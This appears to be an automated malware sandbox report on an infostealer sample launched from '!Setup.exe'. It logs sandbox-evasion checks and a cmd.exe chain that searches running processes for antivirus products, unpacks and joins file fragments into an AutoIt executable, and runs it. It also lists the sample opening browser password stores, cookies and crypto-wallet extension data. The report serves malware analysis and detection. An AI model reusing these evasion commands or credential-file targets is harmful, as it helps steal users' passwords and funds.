      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2005Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1398Jump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com TID: 8144Thread sleep time: -150000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com TID: 8144Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4248Thread sleep count: 2005 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6016Thread sleep count: 1398 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4500Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\!Setup.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\!Setup.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 71992Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E EcJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Ratio" Returning Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 71992\Banned.com + Fwd + Rise + Designed + Balanced + Available + Dir + Soccer + Race + Ford + Writing 71992\Banned.comJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Bids + ..\Ceo + ..\Throat + ..\Hall + ..\Access + ..\Availability + ..\Scout + ..\War VJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Banned.com VJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: extrac32.exe, 00000008.00000003.1732506920.0000000006B98000.00000004.00000020.00020000.00000000.sdmp, Banned.com, 0000000C.00000000.1737341363.0000000000263000.00000002.00000001.01000000.00000007.sdmp, Banned.com.1.dr, Race.8.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\!Setup.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
